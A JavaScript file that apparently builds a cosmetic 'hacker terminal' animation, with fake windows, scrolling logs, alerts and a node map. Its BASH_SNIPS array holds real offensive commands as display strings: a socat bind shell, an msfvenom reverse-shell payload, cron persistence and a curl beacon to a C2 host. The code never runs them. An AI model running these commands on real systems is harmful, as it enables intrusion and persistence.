/**
 * SHADOWSCRIPT — Black-ops terminal simulation
 * English only. Exposes window.ShadowOps.
 */
(function () {
  "use strict";
  const SHADOW_CODE = ["#kernel.init(v4.1) -> READY","bind @c2_nodes as swarm;","pierce firewall://target ~> inject(payload);","route.anonymize(swarm, hops=17);","spoof.handshake(ADMIN) ||> AUTHORIZED","loop @defense { nullify(counter); }","::overdrive force_packet(false_ack);","encrypt(key=ephemeral) === SECURE","inject.false_trace(src=ghost-01, dst=SOC);","@target.nodes.compromised = 23;","script.run(\"bypass_protocol\") ~> SUCCESS","nullify(LOCKDOWN, t_minus=0);","forge.cert(CN=*.corp.internal) ~> TRUSTED","mirror.traffic(to=null_sink) === GHOST","desync.clock(offset=-380ms) -> TRACE_BROKEN","exfil.stage(chunk=64k, channel=dns) -> QUEUED","killswitch.arm(timeout=900) === ARMED","lateral.move(host=10.0.0.88, method=wmi) ~> OK","persist.service(name=systemd-timesyncd) === INSTALLED","dump.lsass(pid=712) -> minidump.dmp","relay.ntlm(target=dc01) ||> CAPTURED","tunnel.wire(local=127.0.0.1:9050) === UP","scrub.eventlog(channels=Security,Sysmon) ~> DONE","beacon.jitter(base=12s, jitter=40%) === SET"];
  const SYSTEM_LOGS = [{text:"[SYSTEM] Loading custom kernel modules...",delay:380},{text:"[SYSTEM] Parser online. ShadowScript v4.1.",delay:320},{text:"[STATUS] Engine: READY.",delay:360},{text:"[NET] Scanning local segment for live hosts...",delay:520},{text:"[NET] 23 nodes marked. Routes anonymized via 17 hops.",delay:480},{text:"[TARGET] Firewall probe in progress...",delay:450},{text:"[OPS] Payload staging complete. Awaiting execute.",delay:400},{text:"[SHADOW] Executing...",delay:500}];
  const MID_SEQUENCE = [{text:"[SHADOW] Generating polymorphic payload...",delay:380},{text:"[SHADOW] Injecting... ",delay:260,progress:true},{text:"[!] CRITICAL ALERT",delay:120,critical:true},{text:"[DETECT] Automated defense system engaged. Source tracing active.",delay:620},{text:"[DEFENSE] Countermeasures online. IP triangulation started.",delay:480},{text:"[DEFENSE] Lockdown protocol T-minus 8 seconds.",delay:550},{text:">> [OPS] Bypass protocol: OVERDRIVE initiated.",delay:720,bypass:true},{text:"[SHADOW] Intercepting defense packets...",delay:420},{text:"[SHADOW] False handshakes injected. [OK]",delay:460},{text:"[SHADOW] Admin credentials spoofed. [AUTHORIZED]",delay:500},{text:"[SHADOW] Defense loop forced into infinite null cycle.",delay:540},{text:"[STATUS] Threat level: NEUTRALIZED.",delay:400,secure:true},{text:"[STATUS] Session re-secured. Resume operations.",delay:420}];
  const ALERT_FLOOD = ["[ALERT] External SOC signature match — confidence 0.61","[ALERT] Trace packets detected on uplink. Distance: 4 hops","[ALERT] Automated response system escalated to stage 2","[ALERT] Certificate transparency log query against forged CN","[ALERT] Upstream router received emergency block request","[ALERT] Geolocation heuristic running — accuracy 12%","[ALERT] Reverse probes received from multiple ASNs","[ALERT] Session fingerprint flagged by threat intel feed","[ALERT] Possible LE coordination signal on shared channels","[ALERT] Log scrub incomplete — residual artifacts remain","[ALERT] Temporary blackhole predicted within T-60s","[ALERT] Node 10.0.0.88 added to watchlist (unconfirmed)","[ALERT] Signature evasion patch applied under load","[ALERT] Noise generation increased — false positives rising","[ALERT] Tracking AI entered feedback loop (possible)","[ALERT] Route path crosses monitored autonomous systems","[ALERT] Session hijack traces purged from local buffers","[ALERT] Inbound query packets dropped at edge","[WARN] Emergency response team status: ONLINE","[WARN] Hash of ghost-01 observed in shared IOC list","[CRIT] Forced trace initiated from external SOC","[CRIT] Multiple ISPs may have received cooperation request","[INFO] Origin rewritten to external botnet pool","[INFO] Timestamps shifted. Log pollution complete","[SHADOW] Self removed from automated blocklists","[SHADOW] Reverse probes answered with decoy responses","[STATUS] Temporarily dropped from active monitoring net","[ALERT] EDR telemetry spike on endpoint ghost-01","[ALERT] Unusual process tree: explorer.exe -> powershell -> encoded","[ALERT] LSASS access pattern matched credential dump heuristic","[ALERT] DNS query volume anomaly — possible tunnel","[ALERT] Kerberos TGS request for sensitive SPN observed","[CRIT] Multiple failed MFA prompts from new ASN","[WARN] Sysmon Event ID 10 (process access) flooding","[INFO] Living-off-the-land binary execution sequence detected","[STATUS] Stealth re-enforced. Detect probability 0.4%"];
  const BASH_SNIPS = ["nmap -sS -sV -O -T4 --open 10.0.0.0/24","ssh -i ~/.ssh/id_ed25519 -p 2222 root@10.0.0.42","curl -s -X POST https://c2.internal/v1/beacon -d @payload.bin","tcpdump -i eth0 -nn -s0 -w /tmp/.x/cap.pcap port 443","proxychains4 nmap -Pn -sS 172.16.0.0/16","rsync -avz -e 'ssh -p 2222' ./stage/ root@10.0.0.88:/tmp/.x/","python3 -c 'import socket; print(socket.gethostbyname(\"target.local\"))'","hashcat -m 22000 capture.hc22000 rockyou.txt -w 3 --force","iptables -A OUTPUT -d 203.0.113.0/24 -j DROP","openssl s_client -connect target:443 -servername spoof.local 2>/dev/null","socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr","msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -f elf > /tmp/.x/p","chattr +i /tmp/.x/p; chmod 700 /tmp/.x/p","echo '*/5 * * * * /tmp/.x/p' | crontab -"];
  const PARAM_LINES = ["CPU_LOAD        ████████░░  81%","MEM_USAGE       ███████░░░  69%","NET_IN          18.3 MB/s","NET_OUT         11.2 MB/s","LATENCY         37 ms (jitter 4ms)","ENTROPY_POOL    0xC4A1...F902","ACTIVE_TUNNELS  9","SPOOF_SCORE     0.97","DETECT_RISK     LOW -> MED","GHOST_NODES     23 online","FALSE_ACK_RATE  99.4%","CLOCK_SKEW      -380 ms","CERT_FORGE      ACTIVE","TRACE_DEPTH     3 hops remaining","EXFIL_QUEUE     4 chunks pending","KILLSWITCH      ARMED"];
  const WINDOW_CONFIGS = [
    {id:"w-shadow",title:"shadow@ghost-01",path:"~/ops",badge:"CORE",badgeClass:"purple",tabs:["kernel","overdrive","payload"],activeTab:0,type:"shadow",secondary:false,x:2,y:6,w:38,h:48},
    {id:"w-log",title:"ops-log",path:"/var/log/ops",badge:"LIVE",badgeClass:"green",tabs:["system","net","defense","alert"],activeTab:0,type:"log",secondary:true,x:42,y:5,w:36,h:42},
    {id:"w-map",title:"Node Topology",path:"mesh://global",badge:"SCAN",badgeClass:"cyan",tabs:["mesh","routes","threat"],activeTab:0,type:"map",secondary:false,map:true,x:2,y:56,w:38,h:36},
    {id:"w-shell",title:"root@ghost-01",path:"~/stage",badge:"ACTIVE",badgeClass:"green",tabs:["shell","recon","exfil"],activeTab:0,type:"bash",secondary:false,x:42,y:49,w:36,h:42},
    {id:"w-params",title:"sys-monitor",path:"/proc/ops",badge:"MON",badgeClass:"cyan",tabs:["live","risk","forge"],activeTab:0,type:"params",secondary:true,x:80,y:6,w:18,h:40},
    {id:"w-alert",title:"ALERT FEED",path:"intel://feed",badge:"!",badgeClass:"red",tabs:["feed","trace","noise"],activeTab:0,type:"alert",secondary:false,x:80,y:48,w:18,h:44}
  ];
  const state = {windows:{},activeId:"w-shadow",packets:0,bytes:0,sessions:1,threat:"LOW",phase:"boot",intensity:1,frozen:false,glitch:false,redAlert:false,matrixDensity:1,matrixSpeed:1,alertRate:1,typingMul:1};
  function $(s){return document.querySelector(s);}
  function randomFrom(a){return a[Math.floor(Math.random()*a.length)];}
  function escapeHtml(str){return String(str).replace(/&/g,String.fromCharCode(38)+"amp;").replace(/</g,String.fromCharCode(38)+"lt;").replace(/>/g,String.fromCharCode(38)+"gt;").replace(/"/g,String.fromCharCode(38)+"quot;");}
  function colorize(line,type){
    if(type==="log"||type==="alert"){
      if(/SUCCESS|AUTHORIZED|NEUTRALIZED|READY|\[OK\]|re-secured|dropped from/.test(line))return '<span class="success">'+escapeHtml(line)+"</span>";
      if(/CRITICAL|DETECT|Lockdown|CRIT|Forced trace|escalated/.test(line))return '<span class="crit">'+escapeHtml(line)+"</span>";
      if(/WARN|DEFENSE|T-minus|ALERT|SOC|watchlist|INTEL|EDR|LSASS|Sysmon/.test(line))return '<span class="warn">'+escapeHtml(line)+"</span>";
      if(/SHADOW|ShadowScript|OPS/.test(line))return '<span class="shadow">'+escapeHtml(line)+"</span>";
      if(/USER INPUT|>> \[OPS\]/.test(line))return '<span class="highlight">'+escapeHtml(line)+"</span>";
      return '<span class="dim">'+escapeHtml(line)+"</span>";
    }
    if(type==="shadow"){var s=escapeHtml(line);s=s.replace(/#(kernel|overdrive)/g,'<span class="keyword">#$1</span>');s=s.replace(/\b(bind|pierce|inject|spoof|loop|nullify|route|force_packet|encrypt|forge|mirror|desync|exfil|killswitch|lateral|persist|dump|relay|tunnel|scrub|beacon)\b/g,'<span class="func">$1</span>');s=s.replace(/(@[a-zA-Z_][\w]*)/g,'<span class="string">$1</span>');s=s.replace(/(->|~>|\|\|>|===|::)/g,'<span class="keyword">$1</span>');s=s.replace(/\b(\d+)\b/g,'<span class="number">$1</span>');return s;}
    if(type==="bash"){var b=escapeHtml(line);b=b.replace(/\b(nmap|ssh|curl|tcpdump|python3|hashcat|proxychains4|rsync|iptables|openssl|socat|msfvenom|chattr|chmod|crontab)\b/g,'<span class="func">$1</span>');b=b.replace(/(['"`])(?:(?!\1)[^\\]|\\.)*\1/g,'<span class="string">$&</span>');return b;}
    if(type==="params")return '<span class="dim">'+escapeHtml(line)+"</span>";
    return escapeHtml(line);
  }
  function createWindow(cfg){
    var el=document.createElement("div");var isActive=cfg.id===state.activeId;var extraCls="";
    if(cfg.secondary)extraCls+=" secondary";if(cfg.map)extraCls+=" map-win";if(cfg.type==="alert")extraCls+=" alert-win";if(isActive)extraCls+=" active glow";
    el.className="window"+extraCls;el.id=cfg.id;el.style.left=cfg.x+"%";el.style.top=cfg.y+"%";el.style.width=cfg.w+"%";el.style.height=cfg.h+"%";el.style.zIndex=isActive?"40":String(10+Math.floor(Math.random()*10));
    var tabsHtml="";for(var i=0;i<cfg.tabs.length;i++)tabsHtml+='<div class="tab'+(i===cfg.activeTab?" active":"")+(cfg.secondary?" cyan-active":"")+'">'+cfg.tabs[i]+"</div>";
    var titlePart='<div class="title-bar"><div class="traffic"><span class="close"></span><span class="min"></span><span class="max"></span></div><div class="title">'+cfg.title+' <span class="path">· '+cfg.path+"</span></div><span class="badge "+(cfg.badgeClass||"")+'">'+cfg.badge+'</span></div><div class="tabs">'+tabsHtml+"</div>";
    if(cfg.map)el.innerHTML=titlePart+'<div class="map-body"><canvas id="map-canvas"></canvas><div class="map-legend"><span class="node-compromised"></span>owned &nbsp;<span class="node-scan"></span>scan &nbsp;<span class="node-gca"></span>defense &nbsp;<span class="node-safe"></span>clean</div></div>';
    else el.innerHTML=titlePart+'<div class="term-body"><pre class="output"></pre></div>';
    var stage=$(".stage");if(stage)stage.appendChild(el);
    var maxLines=Math.max(6,Math.floor((cfg.h/100)*(window.innerHeight||800)/16)-2);
    state.windows[cfg.id]={el:el,cfg:cfg,lines:[],maxLines:maxLines,typing:false};return el;
  }
  function setActive(id){state.activeId=id;Object.keys(state.windows).forEach(function(wid){var w=state.windows[wid];if(!w||!w.el)return;if(wid===id){w.el.classList.add("active","glow");w.el.style.zIndex="45";}else{w.el.classList.remove("active","glow");w.el.style.zIndex=String(10+Math.floor(Math.random()*15));}});}
  function renderOutput(w){if(!w||!w.el||w.cfg.map)return;var pre=w.el.querySelector(".output");if(!pre)return;var promptClass=w.cfg.type==="shadow"?"prompt-shadow":(w.cfg.secondary||w.cfg.type==="params"?"prompt-cyan":"prompt");var cursorCls=w.cfg.type==="shadow"?"cursor purple":(w.cfg.type==="alert"?"cursor red":(w.cfg.secondary?"cursor":"cursor pink"));var html=w.lines.join("\n");if(!w.typing)html+="\n<span class=\""+promptClass+"\">$</span> <span class=\""+cursorCls+"\"></span>";pre.innerHTML=html;pre.scrollTop=pre.scrollHeight;}
  function appendLine(winId,htmlLine,withPrompt){var w=state.windows[winId];if(!w||w.cfg.map)return;var promptClass=w.cfg.type==="shadow"?"prompt-shadow":(w.cfg.secondary||w.cfg.type==="params"?"prompt-cyan":"prompt");var prompt=withPrompt?'<span class="'+promptClass+'">$</span> ':"";w.lines.push(prompt+htmlLine);if(w.lines.length>w.maxLines)w.lines=w.lines.slice(-w.maxLines);renderOutput(w);}
  function typeLine(winId,text,type,speed){speed=typeof speed==="number"?speed:5;return new Promise(function(resolve){var w=state.windows[winId];if(!w||w.cfg.map){resolve();return;}w.typing=true;var pre=w.el.querySelector(".output");var promptClass=type==="shadow"?"prompt-shadow":(w.cfg.secondary||type==="params"?"prompt-cyan":"prompt");var cursorCls=type==="shadow"?"cursor purple":(type==="alert"?"cursor red":(w.cfg.secondary?"cursor":"cursor pink"));var i=0;var base=w.lines.slice();var colored=colorize(text,type);if(speed<3){appendLine(winId,colored,true);w.typing=false;resolve();return;}function step(){i++;var partial=escapeHtml(text.slice(0,i));if(pre){pre.innerHTML=base.concat(['<span class="'+promptClass+'">$</span> <span class="cmd">'+partial+'</span><span class="'+cursorCls+'"></span>']).join("\n");pre.scrollTop=pre.scrollHeight;}if(i>=text.length){w.lines=base.concat(['<span class="'+promptClass+'">$</span> '+colored]);w.typing=false;renderOutput(w);resolve();}else setTimeout(step,speed+Math.random()*3);}step();});}
  function sleep(ms){return new Promise(function(r){setTimeout(r,ms);});}
  function animateProgress(winId,prefix,duration){return new Promise(function(resolve){var w=state.windows[winId];if(!w){resolve();return;}var pre=w.el.querySelector(".output");var base=w.lines.slice();var steps=20,i=0;function tick(){i++;var pct=Math.min(100,Math.round((i/steps)*100));var filled=Math.floor(pct/5);var bar="█".repeat(filled)+"░".repeat(20-filled);var line='<span class="shadow">'+escapeHtml(prefix)+"["+bar+"] "+pct+"%</span>";if(pre){pre.innerHTML=base.concat([line]).join("\n");pre.scrollTop=pre.scrollHeight;}if(i>=steps){w.lines=base.concat([line]);renderOutput(w);resolve();}else setTimeout(tick,duration/steps);}tick();});}
  async function runBootSequence(){state.phase="boot";setActive("w-log");showToast("SYSTEM","ShadowScript kernel loading...");for(var i=0;i<SYSTEM_LOGS.length;i++){var item=SYSTEM_LOGS[i];appendLine("w-log",colorize(item.text,"log"),false);if(item.text.indexOf("ShadowScript")!==-1||item.text.indexOf("Engine")!==-1)await typeLine("w-shadow",randomFrom(SHADOW_CODE),"shadow",4);await sleep(item.delay);}await sleep(260);await runMidSequence();}
  async function runMidSequence(){state.phase="mid";setActive("w-log");var statusMode=document.getElementById("status-mode");var statusBar=document.querySelector(".status-bar");for(var i=0;i<MID_SEQUENCE.length;i++){var item=MID_SEQUENCE[i];if(item.progress){await animateProgress("w-log",item.text,1000);await sleep(100);continue;}if(item.critical){showCriticalOverlay("[DETECTION]\nAutomated defense system engaged.\nSource tracing active.\n\nCountermeasures online.\nLockdown protocol imminent.");if(statusBar)statusBar.classList.add("alert-mode");if(statusMode){statusMode.textContent="CRITICAL";statusMode.className="label-crit";}state.threat="CRIT";updateHudImmediate();Object.keys(state.windows).forEach(function(id){var w=state.windows[id];if(w&&w.el)w.el.classList.add("alert-flash");});showToast("CRITICAL","Defense system engaged — tracing...",true);}appendLine("w-log",colorize(item.text,"log"),false);if(item.bypass){setActive("w-shadow");await typeLine("w-shadow","::overdrive force_packet(false_ack);","shadow",5);await typeLine("w-shadow","spoof.handshake(ADMIN) ||> AUTHORIZED","shadow",4);await typeLine("w-shadow","loop @defense { nullify(counter); }","shadow",4);await typeLine("w-shadow","forge.cert(CN=*.corp.internal) ~> TRUSTED","shadow",4);}if(item.secure){hideCriticalOverlay();if(statusBar)statusBar.classList.remove("alert-mode");if(statusMode){statusMode.textContent="STEALTH";statusMode.className="label-warn";}state.threat="LOW";updateHudImmediate();Object.keys(state.windows).forEach(function(id){var w=state.windows[id];if(w&&w.el)w.el.classList.remove("alert-flash");});showToast("SECURE","Threat neutralized · session re-secured");}await sleep(item.delay);}state.phase="free";startFreeLoops();}
  function startFreeLoops(){runSequence("w-shadow");runSequence("w-shell");setTimeout(function(){runSequence("w-log");},700);setTimeout(function(){runAlertFlood();},1100);setTimeout(function(){runParamsLoop();},1400);}
  function runSequence(winId){var w=state.windows[winId];if(!w||w.cfg.map)return;var type=w.cfg.type;var pool=type==="shadow"?SHADOW_CODE:(type==="bash"?BASH_SNIPS:SYSTEM_LOGS.map(function(x){return x.text;}));function loop(){if(state.phase!=="free"&&winId!=="w-shadow"){setTimeout(loop,480);return;}if(state.frozen){setTimeout(loop,800);return;}var p;if(Math.random()>0.26){var cmd=randomFrom(pool);var speed=type==="log"?2:(type==="shadow"?3.2:3.8+Math.random()*5);speed=Math.max(1,speed/(state.typingMul||1));p=typeLine(winId,cmd,type,speed).then(function(){return sleep(50+Math.random()*180);});}else{var burst=2+Math.floor(Math.random()*4);var b=0;function nextBurst(){if(b>=burst)return sleep(90+Math.random()*180);appendLine(winId,colorize(randomFrom(pool),type),type!=="log");b++;return sleep(16+Math.random()*30).then(nextBurst);}p=nextBurst();}p.then(function(){if(w.lines.length>w.maxLines-2&&Math.random()>0.52)w.lines=w.lines.slice(-Math.floor(w.maxLines*0.35));loop();}).catch(function(){setTimeout(loop,380);});}loop();}
  function runAlertFlood(){var w=state.windows["w-alert"];if(!w)return;function loop(){if(state.phase!=="free"){setTimeout(loop,550);return;}if(state.frozen){setTimeout(loop,1200);return;}var msg=randomFrom(ALERT_FLOOD);appendLine("w-alert",colorize(msg,"alert"),false);if(Math.random()>0.8){var short=msg.replace(/^\[.*?\]\s*/,"").slice(0,44);showToast("ALERT",short,/CRIT|Forced|escalated|EDR|LSASS/.test(msg));}if(Math.random()>0.68)appendLine("w-log",colorize(msg,"log"),false);if(w.lines.length>w.maxLines-1)w.lines=w.lines.slice(-Math.floor(w.maxLines*0.4));setTimeout(loop,Math.max(80,(360+Math.random()*850)/(state.alertRate||1)));}loop();}
  function runParamsLoop(){var w=state.windows["w-params"];if(!w)return;function loop(){if(state.phase!=="free"){setTimeout(loop,650);return;}if(state.frozen){setTimeout(loop,1000);return;}var lines=PARAM_LINES.slice();for(var i=0;i<3;i++){var idx=Math.floor(Math.random()*lines.length);if(lines[idx].indexOf("%")!==-1)lines[idx]=lines[idx].replace(/\d+%/, (45+Math.floor(Math.random()*50))+"%");}w.lines=[];lines.forEach(function(l){appendLine("w-params",colorize(l,"params"),false);});setTimeout(loop,1700+Math.random()*2000);}loop();}
  function initMap(){var canvas=document.getElementById("map-canvas");if(!canvas)return;var ctx=canvas.getContext("2d");if(!ctx)return;var nodes=[],links=[],W,H;function resize(){var parent=canvas.parentElement;W=canvas.width=parent.clientWidth||400;H=canvas.height=parent.clientHeight||200;}function seed(){nodes=[];for(var i=0;i<24;i++)nodes.push({x:25+Math.random()*(W-50),y:18+Math.random()*(H-36),r:2.5+Math.random()*3.5,type:i<4?"gca":(i<13?"compromised":(i<18?"scan":"safe")),vx:(Math.random()-0.5)*0.35,vy:(Math.random()-0.5)*0.35,pulse:Math.random()*Math.PI*2});links=[];for(var j=0;j<30;j++){var a=Math.floor(Math.random()*nodes.length);var b=Math.floor(Math.random()*nodes.length);if(a!==b)links.push([a,b]);}}function draw(){if(!W||!H)return;ctx.clearRect(0,0,W,H);ctx.strokeStyle="rgba(155,93,229,0.05)";ctx.lineWidth=1;for(var gx=0;gx<W;gx+=26){ctx.beginPath();ctx.moveTo(gx,0);ctx.lineTo(gx,H);ctx.stroke();}for(var gy=0;gy<H;gy+=26){ctx.beginPath();ctx.moveTo(0,gy);ctx.lineTo(W,gy);ctx.stroke();}for(var i=0;i<links.length;i++){var n1=nodes[links[i][0]],n2=nodes[links[i][1]];if(!n1||!n2)continue;var alpha=0.1+Math.sin(Date.now()/900+i)*0.07;if(n1.type==="compromised"||n2.type==="compromised")ctx.strokeStyle="rgba(255,45,149,"+(alpha+0.14)+")";else if(n1.type==="gca"||n2.type==="gca")ctx.strokeStyle="rgba(255,51,85,"+(alpha+0.22)+")";else ctx.strokeStyle="rgba(0,245,255,"+alpha+")";ctx.beginPath();ctx.moveTo(n1.x,n1.y);ctx.lineTo(n2.x,n2.y);ctx.stroke();}for(var k=0;k<nodes.length;k++){var n=nodes[k];n.pulse+=0.045;n.x+=n.vx;n.y+=n.vy;if(n.x<12||n.x>W-12)n.vx*=-1;if(n.y<10||n.y>H-10)n.vy*=-1;var glow=0.5+Math.sin(n.pulse)*0.38;var color=n.type==="compromised"?"255,45,149":n.type==="gca"?"255,51,85":n.type==="scan"?"0,245,255":"57,255,20";ctx.beginPath();ctx.arc(n.x,n.y,n.r+4*glow,0,Math.PI*2);ctx.fillStyle="rgba("+color+","+(0.13*glow)+")";ctx.fill();ctx.beginPath();ctx.arc(n.x,n.y,n.r,0,Math.PI*2);ctx.fillStyle="rgba("+color+",0.92)";ctx.shadowColor="rgba("+color+",0.85)";ctx.shadowBlur=9;ctx.fill();ctx.shadowBlur=0;}requestAnimationFrame(draw);}resize();seed();window.addEventListener("resize",function(){resize();seed();});draw();setInterval(function(){if(nodes.length&&Math.random()>0.55){var n=randomFrom(nodes);if(n.type!=="gca")n.type=randomFrom(["compromised","scan","safe","compromised"]);}},1700);}
  function initMatrix(){var canvas=document.getElementById("matrix-canvas");if(!canvas)return;var ctx=canvas.getContext("2d");if(!ctx)return;var w,h,cols,drops;var chars="01ABCDEF#$%&*+-=<>[]{}|/\\";function resize(){w=canvas.width=window.innerWidth;h=canvas.height=window.innerHeight;cols=Math.floor(w/16);drops=[];for(var i=0;i<cols;i++)drops[i]=Math.random()*-40;}function draw(){ctx.fillStyle="rgba(7,5,15,0.07)";ctx.fillRect(0,0,w,h);ctx.font="13px monospace";for(var i=0;i<drops.length;i++){var ch=chars[Math.floor(Math.random()*chars.length)];ctx.fillStyle=Math.random()>0.91?"#00f5ff":"rgba(0,245,255,0.26)";ctx.fillText(ch,i*16,drops[i]*16);if(drops[i]*16>h&&Math.random()>0.972)drops[i]=0;drops[i]+=state.matrixSpeed||1;if(state.matrixDensity>1&&Math.random()<0.02*state.matrixDensity){ctx.fillStyle="#ff3355";ctx.fillText(ch,i*16,drops[i]*16);}}requestAnimationFrame(draw);}resize();window.addEventListener("resize",resize);draw();}
  function spawnParticles(){var container=$(".ambient");if(!container)return;var colors=["pink","cyan","gold","green","red"];for(var i=0;i<28;i++){var p=document.createElement("div");p.className="ambient-particle "+randomFrom(colors);var size=2+Math.random()*3.5;p.style.width=size+"px";p.style.height=size+"px";p.style.left=Math.random()*100+"%";p.style.animationDuration=8+Math.random()*14+"s";p.style.animationDelay=Math.random()*10+"s";container.appendChild(p);}}
  function updateHudImmediate(){var pkt=document.getElementById("hud-packets");var byt=document.getElementById("hud-bytes");var ses=document.getElementById("hud-sessions");var thr=document.getElementById("hud-threat");var clk=document.getElementById("hud-clock");if(pkt)pkt.textContent=state.packets.toLocaleString();if(byt)byt.textContent=(state.bytes/1024).toFixed(1)+" KB";if(ses)ses.textContent=String(state.sessions);if(thr){thr.textContent=state.threat;thr.className="val"+(state.threat==="HIGH"||state.threat==="CRIT"?" val-red":"");}if(clk)clk.textContent=new Date().toTimeString().slice(0,8);}
  function updateHud(){if(state.frozen){updateHudImmediate();return;}state.packets+=Math.floor(Math.random()*60*(state.intensity||1))+14;state.bytes+=Math.floor(Math.random()*20000*(state.intensity||1))+3000;if(Math.random()>0.87)state.sessions=2+Math.floor(Math.random()*10);if(state.phase==="free"&&Math.random()>0.93&&!state.redAlert)state.threat=randomFrom(["LOW","MED","HIGH"]);updateHudImmediate();}
  function showToast(title,body,isCrit){var t=document.getElementById("toast");if(!t)return;var titleEl=t.querySelector(".toast-title");var bodyEl=t.querySelector(".toast-body");if(titleEl)titleEl.textContent=title;if(bodyEl)bodyEl.textContent=body;t.classList.toggle("crit-toast",!!isCrit);t.classList.add("show");setTimeout(function(){t.classList.remove("show");},3000);}
  function showCriticalOverlay(msg){var ov=document.getElementById("crit-overlay");var body=document.getElementById("crit-body");if(!ov)return;if(body)body.textContent=msg;ov.classList.add("show");}
  function hideCriticalOverlay(){var ov=document.getElementById("crit-overlay");if(ov)ov.classList.remove("show");}
  function rotateFocus(){if(state.phase!=="free"||state.frozen)return;var ids=Object.keys(state.windows);if(ids.length)setActive(randomFrom(ids));}
  function applyBodyClass(name,on){if(on)document.body.classList.add(name);else document.body.classList.remove(name);}
  function opsSetIntensity(n){n=Math.max(0.25,Math.min(4,Number(n)||1));state.intensity=n;state.typingMul=n;state.alertRate=n;state.matrixSpeed=Math.max(0.5,Math.min(3,n));return state.intensity;}
  function opsGlitch(ms){ms=Math.max(200,Math.min(8000,Number(ms)||1200));state.glitch=true;applyBodyClass("ops-glitch",true);Object.keys(state.windows).forEach(function(id){var w=state.windows[id];if(w&&w.el)w.el.classList.add("alert-flash");});setTimeout(function(){state.glitch=false;applyBodyClass("ops-glitch",false);Object.keys(state.windows).forEach(function(id){var w=state.windows[id];if(w&&w.el)w.el.classList.remove("alert-flash");});},ms);}
  function opsRedAlert(on){state.redAlert=!!on;applyBodyClass("ops-redalert",state.redAlert);if(state.redAlert){state.threat="CRIT";state.alertRate=Math.max(state.alertRate,2.5);showCriticalOverlay("[RED ALERT]\nDefense posture elevated.\nMultiple sensors correlating.");var m=document.getElementById("status-mode");if(m){m.textContent="CRIT";m.className="label-crit";}}else{hideCriticalOverlay();state.threat="LOW";var m2=document.getElementById("status-mode");if(m2){m2.textContent="STEALTH";m2.className="label-warn";}}updateHudImmediate();}
  function opsFreeze(on){state.frozen=!!on;applyBodyClass("ops-frozen",state.frozen);}
  function opsFocus(winKey){var map={shadow:"w-shadow",log:"w-log",map:"w-map",shell:"w-shell",params:"w-params",alert:"w-alert"};var id=map[String(winKey||"").toLowerCase()]||winKey;if(state.windows[id])setActive(id);return id;}
  function opsInject(winKey,text){var map={shadow:"w-shadow",log:"w-log",shell:"w-shell",params:"w-params",alert:"w-alert"};var id=map[String(winKey||"log").toLowerCase()]||"w-log";var w=state.windows[id];if(!w||w.cfg.map)return false;var type=w.cfg.type||"log";appendLine(id,colorize(String(text||""),type),type!=="log"&&type!=="alert");return true;}
  function opsBurst(n){n=Math.max(1,Math.min(20,Number(n)||5));for(var i=0;i<n;i++){(function(msg,delay){setTimeout(function(){if(state.windows["w-alert"])appendLine("w-alert",colorize(msg,"alert"),false);if(state.windows["w-log"]&&Math.random()>0.4)appendLine("w-log",colorize(msg,"log"),false);},delay);})(randomFrom(ALERT_FLOOD),i*120);}}
  function opsThreat(level){var v=String(level||"LOW").toUpperCase();if(["LOW","MED","HIGH","CRIT"].indexOf(v)===-1)v="LOW";state.threat=v;updateHudImmediate();}
  function opsHideWindow(winKey,hide){var map={shadow:"w-shadow",log:"w-log",map:"w-map",shell:"w-shell",params:"w-params",alert:"w-alert"};var id=map[String(winKey||"").toLowerCase()];var w=id&&state.windows[id];if(!w||!w.el)return false;w.el.style.display=hide?"none":"";return true;}
  function opsMatrix(density,speed){if(density!=null)state.matrixDensity=Math.max(0.5,Math.min(4,Number(density)||1));if(speed!=null)state.matrixSpeed=Math.max(0.3,Math.min(4,Number(speed)||1));}
  function opsGetState(){return{phase:state.phase,threat:state.threat,intensity:state.intensity,frozen:state.frozen,glitch:state.glitch,redAlert:state.redAlert,packets:state.packets,sessions:state.sessions};}
  window.ShadowOps={setIntensity:opsSetIntensity,glitch:opsGlitch,redAlert:opsRedAlert,freeze:opsFreeze,focus:opsFocus,inject:opsInject,burst:opsBurst,threat:opsThreat,hideWindow:opsHideWindow,matrix:opsMatrix,getState:opsGetState,showToast:showToast,showCritical:showCriticalOverlay,hideCritical:hideCriticalOverlay};
  function boot(){try{WINDOW_CONFIGS.forEach(function(cfg){createWindow(cfg);});Object.keys(state.windows).forEach(function(id){var w=state.windows[id];if(w&&w.el)w.el.addEventListener("mousedown",function(){setActive(id);});});initMatrix();spawnParticles();initMap();setInterval(updateHud,340);updateHudImmediate();setInterval(rotateFocus,7000+Math.random()*3000);setTimeout(runBootSequence,400);setTimeout(function(){showToast("SYSTEM ONLINE","ShadowScript v4.1 · multi-session active");},1000);}catch(err){console.error("boot failed",err);}}
  if(document.readyState==="loading")document.addEventListener("DOMContentLoaded",boot);else boot();
})();
